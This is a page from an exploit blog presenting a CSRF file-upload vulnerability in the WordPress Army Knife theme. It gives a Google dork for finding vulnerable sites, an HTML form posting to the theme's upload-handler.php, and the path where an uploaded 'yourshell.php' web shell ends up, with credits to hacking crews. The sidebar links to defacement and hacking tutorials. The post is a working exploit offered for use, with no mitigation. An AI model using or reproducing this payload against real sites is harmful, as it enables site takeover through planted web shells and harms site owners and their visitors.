• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

WordPress Army Knife CSRF File Upload Vulnerability

November 9, 2013 by Jack Wilder Leave a Comment

Exploit Title: WordPress Army Knife CSRF File Upload Vulnerability
Author: Bebyyers404
Date: 11/09/2013
Vendor Homepage: http://freelancewp.co

Themes Link: http://freelancewp.com/wordpress-theme/army-knife/
Infected File: upload-handler.php
Category: webapps/php
Google dork: inurl:/wp-content/themes/armyknife
Tested on : Windows/Linux

Exploit & POC :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wordpress/wp-content/themes/armyknife/functions/upload-handler.php" method="post">
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

File path:
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/yourshell.php

./Nabilaholic404, ./Bebyyers404, ./Panda Dot ID, ./Tsunaomi48, ./Pscript ./Mbah-Rowo

JKT48 CYBER TEAM & Black Devils Crew

Shares

Filed Under: WordPress Exploit Tagged With: Exploit

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

GitHub Custom Domain or Subdomain Takeover

Heroku Custom Domain or Subdomain Takeover

Tutorial Hack WHM dan cPanel dengan WHMCS Killer

Deteksi Celah No Redirect pada Suatu Situs menggunakan cURL

Reverse Shell From Local File Inclusion Exploit

bWAPP Remote File Inclusion Medium Security Level

Cracking FTP Password using Hydra on BackBox Linux

Uptimerobot.com Custom Domain or Subdomain Takeover

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

LinuxSec / 72 queries in 0.09 seconds